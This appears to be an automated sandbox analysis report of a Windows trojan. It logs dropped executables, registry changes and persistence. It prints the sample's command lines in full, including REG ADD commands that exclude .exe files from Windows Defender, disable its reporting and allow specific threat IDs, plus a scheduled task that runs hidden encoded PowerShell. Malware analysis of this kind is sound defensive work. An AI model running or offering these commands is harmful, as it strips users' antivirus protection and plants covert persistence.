Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@89/15@2/0
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Mutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2072:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static file information: File size 7604002 > 1048576

Data Obfuscation
barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx 0_2_00411361
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413954 push eax; ret 0_2_00413972
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413CC0 push eax; ret 0_2_00413CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02E4EB56 push es; iretd 38_2_02E4EB57
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .sxdata
Source: Install.exe.0.dr Static PE information: section name: .sxdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00418320

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe File created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe File created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe File created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Creates job files (autostart)
Source: C:\Windows\SysWOW64\schtasks.exe File created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
